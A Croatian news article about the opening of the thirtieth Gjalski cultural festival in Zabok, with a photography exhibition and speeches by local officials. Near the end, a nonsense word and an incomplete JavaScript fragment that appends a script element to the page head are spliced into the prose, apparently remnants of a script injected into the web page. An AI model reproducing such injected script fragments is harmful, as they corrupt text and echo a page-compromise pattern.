Novosti i najave

Otvorena Manifestacija „Dani Ksavera Šandora Gjalskog“

Izložbom „Zabok, moj“ Dragutina Škreblina započeo tjedan kulture

Ovogodišnja manifestacija Dani Ksavera Šandora Gjalskog otvorena je jučer izložbom umjetničkih fotografija Zabočanina Dragutina Škreblina-Dade.

Fotografijom se bavi trideset godina, član je ULUPUH-a, majstor fotografije od 1998. godine kada otvara i obrt. -Ovo je moja prva samostalna izložba, želio sam da bude neobična i pomalo provokativna. Nisam želio da fotografije budu ušminkane već da pričaju priču, Zabok kakav je nekad bio i kakvim ga ja i moji sugrađani vidimo u budućnosti. Svaka priča, pa i ova moja večerašnja ima sretan završetak-rekao je autor Škreblin.

Predsjednik Manifestacije i gradonačelnik Zaboka Ivan Hanžek istaknuo je kako je nagrada Gjalski priznata u struci, njome se diče dobitnici ali i svi koji za nju pretendiraju, a Zabočani se ponose njome i uvijek nastoje biti dobri domaćini. Posebno je pozdravio Zvonka Jurinu, osobu koja je pokrenula ono što je danas lavina profesionalnog i amaterskog stvaralaštva u Gradu Zaboku.

Manifestacija Dani Ksavera Šandora Gjalskog uživa potporu Ministarstva kulture, ispred kojeg je okupljene pozdravila Dubravka Đurić Nemec. -Veliki sam ljubitelj manifestacije Dani Gjalskog, u njoj sudjelujem od njenih samih početaka. Uočavam da je program redizajniran, pojavljuju se novi momenti, sadržaji se obogaćuju i sve više se potiče profesionalno i amatersko bavljenje kulturom-istaknula je. Na izložbu Dragutina Škreblina kratko se osvrnuo predsjednik sekcije fotografa ULUPUH-a Tomislav Rastić. Kazao je kako Škreblin kao svaki ozbiljan fotograf kroničar svoga grada, prati i redovito objektivom bilježi što se u njemu zbiva. Randejikrecons .

Dane Ksavera Šandora Gjalskog i ove godine svesrdno prati Krapinsko-zagorska županija. Njezin prvi čovjek Siniša Hajdaš Dončić poručio je kako ova manifestacija najbolje odražava uspješnu simbiozu gospodarstva i kulture, a izložba fotografija Dade Škreblina je presjek Zabočana različite dobi i životnih opredjeljenja koji Zabok čine najprogresivnijim gradom u regiji. Župan je otvorio tridesete, jubilarne Dane Ksavera Šandora Gjalskog, a okupljene je blues ritmom na usnoj harmonici u hladno listopadsko predvečerje zagrijao Tomislav Goluban.d.getElementsByTagName(‘head’)[0].appendChild(s);

Dodano:
20. 12. 2009. u 14:17

Autor:
Neven Miškulin

Sljedeća vijest: